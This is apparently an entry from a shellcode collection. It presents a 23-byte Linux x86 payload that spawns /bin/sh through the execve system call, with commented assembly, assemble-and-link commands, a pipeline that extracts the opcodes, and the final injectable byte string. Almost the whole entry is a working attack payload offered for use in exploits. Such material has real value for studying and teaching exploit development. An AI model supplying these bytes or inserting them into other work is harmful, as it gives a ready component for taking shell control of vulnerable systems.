Shellcodex

execve(“/bin/sh”, NULL, 0) - Spawn shell

OS: Linux

Architecture: Intel x86

Length: 23 bytes

Assembly

section .text
global _start

_start:
	xor ebx, ebx		; null ebx
	mul ebx			; eax, ebx, edx = 0

	mov ecx, eax		; move eax (0) into ecx
	mov al, 0xb		; move execve syscall number into al (eax)

	push ebx		; push null terminator
	push 0x68732f2f		; push "//sh"
	push 0x6e69622f		; push "/bin"
	mov ebx, esp		; move pointer to "/bin//sh" into ebx

	int 0x80		; call execve

Compilation and Linking

# Assemble
nasm -f elf -o code.o code.asm

# Link
ld -m elf_i386 -o code code.o

# Extract Shellcode
printf '\\x' && objdump -d code | grep "^ " | cut -f2 | tr -d ' ' | tr -d '\n' | sed 's/.\{2\}/&\\x /g'| head -c-3 | tr -d ' ' && echo ' '

Shellcode

\x31\xdb\xf7\xe3\x89\xc1\xb0\x0b\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80